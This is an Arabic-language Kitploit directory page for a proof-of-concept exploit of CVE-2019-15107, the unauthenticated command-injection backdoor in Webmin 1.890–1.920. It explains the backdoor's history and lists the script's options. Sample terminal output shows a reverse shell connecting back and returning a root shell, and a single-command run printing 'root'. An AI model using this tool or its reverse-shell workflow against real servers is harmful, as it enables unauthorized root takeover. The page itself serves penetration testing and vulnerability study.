Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-15107 — إثبات مفهوم لاستغلال CVE-2019-15107 (Webmin <= 1.920) مما يتيح تنفيذ تعليمات برمجية عن بعد غير مصادق عليه من خلال حقن الأوامر. | Kitploit
أدوات/GitHubGitHub/adampawelczyk/cve-2019-15107
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubadampawelczyk/cve-2019-15107

cve-2019-15107

إثبات مفهوم لاستغلال CVE-2019-15107 (Webmin <= 1.920) مما يتيح تنفيذ تعليمات برمجية عن بعد غير مصادق عليه من خلال حقن الأوامر.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-15107 - ثغرة تنفيذ أوامر عن بعد غير مصرح بها في Webmin

الوصف

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) للثغرة CVE-2019-15107 التي تؤثر على إصدارات Webmin من 1.890 إلى 1.920.

يستغل البرنامج النصي بابًا خلفيًا في الإصدارات 1.890 إلى 1.920 يسمح للمستخدمين غير المصادق عليهم بحقن أوامر في نقطة النهاية password_change.cgi من خلال المعامل old (في الإصدار 1.890 expired). تم اختراق تنزيلات SourceForge فقط، لكنها مدرجة كتنزيلات رسمية على موقع المشروع.

أدخل مهاجم (مهاجمون) مجهولون عبارات Perl qx في كود مصدر خادم البناء في مناسبتين منفصلتين: مرة في أبريل 2018، حيث أدخل الباب الخلفي في الإصدار 1.890، وفي يوليو 2018، أعاد إدخال الباب الخلفي في الإصدارات 1.900 إلى 1.920.

الإصدار 1.890 فقط هو القابل للاستغلال في التثبيت الافتراضي. الإصدارات المتأثرة اللاحقة تتطلب تمكين ميزة تغيير كلمة المرور منتهية الصلاحية.

البيئة المختبرة

تم اختبار الاستغلال بنجاح ضد:

  • إصدار Webmin: 1.890
  • نظام التشغيل: Ubuntu 18.04.4 LTS

الاستخدام

root@kitploit:~
python3 cve-2019-15107.py -r <TARGET_IP> -l <LOCAL_IP> [options]

options:
  -h, --help                 Show this help message and exit
  -r, --rhost RHOST          Target IP address
  -rp, --rport RPORT         Target port (default: 10000)
  -l, --lhost LHOST          Local IP for reverse shell
  -lp, --lport LPORT         Local port for reverse shell (default: 4343)
  -s, --scheme {http,https}  Protocol to use (default: https)
  -x, --proxy [PROXY]        Use proxy (default: http://127.0.0.1:8080)
  -f, --force                Force exploitation even if detection fails
  -c, --cmd CMD              Execute a single command instead of reverse shell

مثال

root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[*] Detecting target version...
[+] Detected Webmin 1.890
[+] Target is vulnerable
[*] Starting listener on port 4343...
listening on [any] 4343 ...
[*] Sending payload...
connect to [192.168.158.129] from (UNKNOWN) [10.114.159.93] 59970
bash: cannot set terminal process group (1314): Inappropriate ioctl for device
bash: no job control in this shell
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/# 
root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129 -c whoami                                                                                                                                                                 

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[*] Detecting target version...
[+] Detected Webmin 1.890
[+] Target is vulnerable
[+] Command output:
========================================
root

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2019-15107
  • https://webmin.com/security/
  • https://www.exploit-db.com/exploits/47230

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها غير قانوني. استخدمها بمسؤولية.

تنزيل الأداة